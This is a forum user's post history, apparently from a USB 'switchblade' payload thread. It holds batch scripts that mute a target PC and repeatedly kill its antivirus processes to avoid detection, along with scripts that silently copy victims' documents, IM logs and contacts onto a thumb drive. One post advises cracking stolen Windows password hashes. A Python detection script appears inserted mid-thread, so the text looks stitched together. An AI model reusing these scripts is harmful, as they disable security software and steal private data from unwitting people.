Abigwar

Active Members
  • Posts

    13
Posts posted by Abigwar

  1. Are you referring to file attributes and/or switches?

    LOL man, nah, that is what we referred to the underground scene as back then. HPAV. Hacking/Phreaking/Anarchy/Virii/Cracking(or)Carding

    Holy crap, Maybe I am old. :o

  2. Agreed, I had to write a paper on the difference between a Hacker and a Cracker for my IT major. Below is what I can recall, however I can post the whole paper if anyone wants to see it

    Well, hacking is a misnomer. Hacking in general is modifying, say, a piece of hardware to do something it was not designed to do. For example (as stated in another post), flashing the Fon and putting it into a pineapple, that is hacking. An astronomer that modifies his telescope could be called an astronomy hacker.

    At the other end is Cracking. This is when you crack someone's WIFI connection or crack a password on a system.

    Also, the mainstream media has a lot to do with the abuse of the term hacker, probably because of their ignorance. Because let's face it, some of them are not credible; for example, the Fox broadcast about Mass Effect goes to show you how much research they actually do.

    That's it for me before I get into rant mode.

    Maybe I am showing my age here, but I have been involved in the underground since before the internet. Does anyone else remember when hacking was still exploration and cracking was just breaking copy protection on software? Does anyone here remember h/p/a/v/c? Ah, the good old days of txt files and three letter affiliations. lol

  3. I'm not familiar with the "old method," sorry. What folder icon??

    Also, I have another question, though this one isn't support-related:

    How do I get someone's Windows login password? I got a bunch of hashes, and I'm presuming these are what I need...but how do I decrypt them?

    And finally, I'd just like to speak up about the method of payload development that's been going on in this thread. It is very, very confusing that multiple people are making multiple updates to Leapo's payload. A GUI, bug fixes, etc. It's impossible for anyone to keep up.

    In fact, I personally believe having independent payloads in general is bad. Leapo had the right idea; a payload with just about everything. People have been working with Leapo on this payload to make it a fusion of the best ideas and features, and that's been working, but I understand that he's been inactive for a while and people are taking it upon themselves to edit it and add/edit things to make it better. I know that he hasn't been on in a while, but I feel that things would be simpler and better for everyone if they simply collaborated with Leapo and worked on it with him, so there's only one version of Leapo's payload. Unless he does not plan on updating it any time in the next 2 months, or has quit, then people should just be working with him.

    Google John The Ripper, and I respectfully disagree. Such is the nature of community development. It benefits us all. You're just behind the learning curve. You'll catch up...

  4. Well, I'm saying the flaw is that auto-play was disabled by default. Meaning, the person would be immune from attacks without even knowing what auto-play WAS.

    Also, what's with that GO.vbs error I kept getting?

    Even if auto-run is disabled, simply double clicking the U3 drive from my computer will launch it.

    Still can use the old method too, if you're so inclined, and trick people into launching by using the folder icon and dialog for the Open Folder to View Files popup.

  5. Guys, I don't know if anyone else did this, but I solved the no disk error on all my test machines by simply removing A: and B: from the drive testing part of the script. You're getting that error when it tries to scan a floppy drive for the config file. A: and B: tend to be the floppies on most systems. I have no more issues with it.

  6. No offense man, but it doesn't look any different than most other switchblades. What I did notice is that you made a workaround for the Firefox password grabber. I didn't test it, but it looks good. Is part of the package missing or am I totally overlooking something?

  7. Ok guys, we all know that the AVKill (csrss.exe) we use for our switchblades is outdated and flagged by every AV known. So I wanted to come up with an alternative method of killing AV's before launching our switchblades. If this works out, I think it would be a great addition to Leapo's Pocket Knife.

    What I decided to try was using Nircmd's processkill command to eliminate the AV processes. I was concerned that the AV would recognize the attempt and block it, or alert. For AV's such as Avast, we would want to make sure we mute the system speakers. (Note, we would want to do that anyway, because if Avast flags a virus it screams "A VIRUS HAS BEEN DETECTED"). Anyway, if a certain AV alerts to the attempt to kill its process, what is the difference, because it is going to alert to running csrss.exe and some of our other tools. So long as it isn't audible, we still have time to get in and out without immediate detection.

    I tested this on AVG and it worked flawlessly and silently.

    ::Abigwar's First Attempt at Batch AVkiller
    
    ::Mute the system volume, in case of audible AV Alerts (Avast!)
    nircmd mutesysvolume 1
    
    ::Kill AVG Command Center
    nircmd killprocess avgcc.exe
    
    ::Kill other AVG Processes
    nircmd killprocess avgemc.exe
    nircmd killprocess avgupsvc.exe
    nircmd killprocess avgamsvr.exe
    
    ::Restore system volume at end of switchblade
    nircmd mutesysvolume 0

    Now what I would like to ask from all of you is to look at your system processes, and let's make a list of the processes each virus scanner uses. When we have them all listed, we can then script it into the batch to kill all the applicable processes. We also need to see how each AV reacts to the attempt to kill its processes.

    One other thing I was considering is that if an AV's process is persistent, we could loop the batch file to continue to run, and kill the process over and over. How that could work is we would call the separate Anti-AV batch file from the start.bat or go.bat, and let it loop until the switchblade ends. So at the end of the switchblade we would create a text file on the thumbdrive. The loop would stop when it sees the file, then delete it to make it ready for next time and end.

    ::Theoretical Loop batch
    
    :Start
    nircmd killprocess avgcc.exe
    nircmd killprocess avgemc.exe
    nircmd killprocess avgupsvc.exe
    nircmd killprocess avgamsvr.exe
    
    IF EXIST SWITCHDONE.TXT GOTO END
    GOTO START
    :END
    delete switchdone.txt

  8. I was thinking about something...

    We all know AVKill never works anymore because every AV catches it right away.

    So... Has anyone tried using nircmd's killprocess to shut down AV's? If it works, we could create a list of AV processes and then use nircmd to try and shut them ALL down, whether they are installed on that machine or not. The downside, I suppose, would be if the virus scanner alerts that its processes are being killed; however, what is the difference if the AV is alerting it is seeing infected files on the flashdrive anyway. If for stealth purposes you want to make sure the AV is still running after the payload, we could force a reboot.

    Something along the lines of:

    nircmd killprocess avg.exe

    What do you all think?
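Seen from the monitoring side, the behaviour discussed in posts 7 and 8 leaves a clear trail in process-creation telemetry. The following is an added detection example, not code from the posts: the `time|host|command line` layout, the sample events, `WINDOW` and `LOOP_THRESHOLD` are assumptions made for illustration; the process names are the AVG ones listed in post 7.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Process names are the AVG ones listed in the posts; a real watchlist is longer.
PROTECTED = {"avgcc.exe", "avgemc.exe", "avgupsvc.exe", "avgamsvr.exe"}
NIRCMD = r'\bnircmdc?(?:\.exe)?"?\s+'
KILL_RE = re.compile(NIRCMD + r'killprocess\s+"?([\w.\-]+)', re.I)
MUTE_RE = re.compile(NIRCMD + r'mutesysvolume\s+1\b', re.I)
WINDOW = timedelta(seconds=60)  # assumption: correlation window, tune to taste
LOOP_THRESHOLD = 3              # same target killed this often inside WINDOW

# Constructed sample events in a simplified "time|host|command line" layout.
SAMPLE = [
    "2024-01-01T10:00:00|WS01|nircmd mutesysvolume 1",
    "2024-01-01T10:00:01|WS01|nircmd killprocess avgcc.exe",
    "2024-01-01T10:00:02|WS01|nircmd killprocess avgemc.exe",
    "2024-01-01T10:00:05|WS01|nircmd killprocess avgcc.exe",
    "2024-01-01T10:00:09|WS01|nircmd killprocess avgcc.exe",
    "2024-01-01T10:05:00|WS02|nircmd killprocess notepad.exe",
    r'2024-01-01T10:06:00|WS02|"C:\Tools\nircmd.exe" killprocess AVGCC.EXE',
]

def detect(lines):
    """Return (host, target, kind) alerts for kills aimed at protected processes."""
    alerts, muted, kills = [], {}, defaultdict(list)
    for line in lines:
        stamp, host, cmd = line.split("|", 2)
        ts = datetime.fromisoformat(stamp)
        if MUTE_RE.search(cmd):
            muted[host] = ts          # remember the mute as corroborating context
            continue
        m = KILL_RE.search(cmd)
        if not m or m.group(1).lower() not in PROTECTED:
            continue                  # unrelated process, not an AV tamper attempt
        target = m.group(1).lower()
        kills[(host, target)].append(ts)
        recent = [t for t in kills[(host, target)] if ts - t <= WINDOW]
        if len(recent) >= LOOP_THRESHOLD:
            kind = "kill_loop"        # the repeat-until-flag-file pattern
        elif host in muted and ts - muted[host] <= WINDOW:
            kind = "kill_after_mute"  # mute followed by kill on the same host
        else:
            kind = "kill"
        alerts.append((host, target, kind))
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE):
        print(alert)
```

In production the same logic would read real process-creation telemetry, such as Windows Security event 4688 with command-line auditing enabled or Sysmon Event ID 1, instead of the constructed lines.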

  9. I see some issues with your code. Most notably, other than some scripting that won't work, there is no way to extract the contents of wanted.txt for the batch to know what file extensions are listed in it.

    :: By DMilton for free community
    :: Thread http://hak5.org/forums/index.php?showtopic=6746
    
    :: Checks the state of Slurp3.cfg
    IF NOT EXIST %config%\Slurp3.cfg GOTO SkipSlurp3
    
    ::Starts an OS language detection for configuring paths (maybe this could be added to set the initial variables), also it can clean the code too...:). Other languages are very simple to implement too.
    
    :: Detection of ENGLISH OS
    IF EXIST "%HOMEDRIVE%%HOMEPATH%\My Documents\" (
    set MyD=My Documents
    set Dsk=Desktop
    set ShDsk=Shared Desktop
    set ShDoc=Shared Documents
    set MSN=My Received Files
    
    echo The Operating System language is ENGLISH>> %log% 2>&1
    )
    
    :: Detection of SPANISH OS (After chinese, the second used language in the world);)
    IF EXIST "%HOMEDRIVE%%HOMEPATH%\Mis Documentos\" (
    set MyD=Mis Documentos
    set Dsk=Escritorio
    set ShDsk=Escritorio Compartido
    set ShDoc=Documentos Compartidos
    set MSN=Mis Archivos Recibidos
    
    echo The Operating System language is SPANISH>> %log% 2>&1
    )
    
    :: Sets other variables and paths to clean up pathnames later on
    set SlurpDir=%logdir%\Slurp_Data
    set Wanted=%config%\wanted.txt
    
    :: Creates the directory structure for the wanted doc option if not exists
    IF NOT EXIST "%SlurpDir%\%MyD%\" mkdir "%SlurpDir%\%MyD%\"
    IF NOT EXIST "%SlurpDir%\%Dsk%\" mkdir "%SlurpDir%\%Dsk%\"
    IF NOT EXIST "%SlurpDir%\%ShDsk%\" mkdir "%SlurpDir%\%ShDsk%\"
    IF NOT EXIST "%SlurpDir%\%ShDoc%\" mkdir "%SlurpDir%\%ShDoc%\"
    IF NOT EXIST "%SlurpDir%\%MSN%\" mkdir "%SlurpDir%\%MSN%\"
    
    
    :: Copying the files with the same structure as the original
    
    for /F %%a in (%wanted%) do (
    
    xcopy "%HOMEDRIVE%%HOMEPATH%\%MyD%\%%a" "%SlurpDir%\%MyD%\" /H /S /D /C
    xcopy "%HOMEDRIVE%%HOMEPATH%\%Dsk%\%%a" "%SlurpDir%\%Dsk%\" /H /S /D /C
    xcopy "%ALLUSERSPROFILE%\%Dsk%\%%a" "%SlurpDir%\%ShDsk%\" /H /S /D /C
    xcopy "%ALLUSERSPROFILE%\%ShDoc%\%%a" "%SlurpDir%\%ShDoc%\" /H /S /D /C
    xcopy "%HOMEDRIVE%%HOMEPATH%\%MSN%\%%a" "%SlurpDir%\%MSN%\" /H /S /D /C
    )
    
        ECHO ----------------------------------------------------------------------------------------------------------------------------- >> %log% 2>&1
        ECHO +----------------------------------+ >> %log% 2>&1
        ECHO +    [Wanted files were copied]    + >> %log% 2>&1
        ECHO +----------------------------------+ >> %log% 2>&1
    pause
    :SkipSlurp3

  10. Wow! That is a nicely crafted batch file. Good work!

    I added this to the initial :slurp. Pulls contact lists, logs, saved convo's and offline messages for Myspace IM. Have a few other ideas I will implement on my own drive when I get time. Maybe I'll come back and post them.

    :: Myspace IM
    mkdir %logdir%\Slurp_Data\Myspace
    fc.exe "%APPDATA%\Myspace\IM\Conversations\*" "%logdir%\Slurp_Data\Myspace\*" /i /o    
    xcopy "%APPDATA%\MySpace\IM\Logs\*.log" "%logdir%\Slurp_Data\Myspace\" /s /c /q /r /h /y
    xcopy "%APPDATA%\MySpace\IM\ContactCache\*.*" "%logdir%\Slurp_Data\Myspace\" /s /c /q /r /h /y
    xcopy "%APPDATA%\MySpace\IM\Download\*.*" "%logdir%\Slurp_Data\Myspace\" /s /c /q /r /h /y
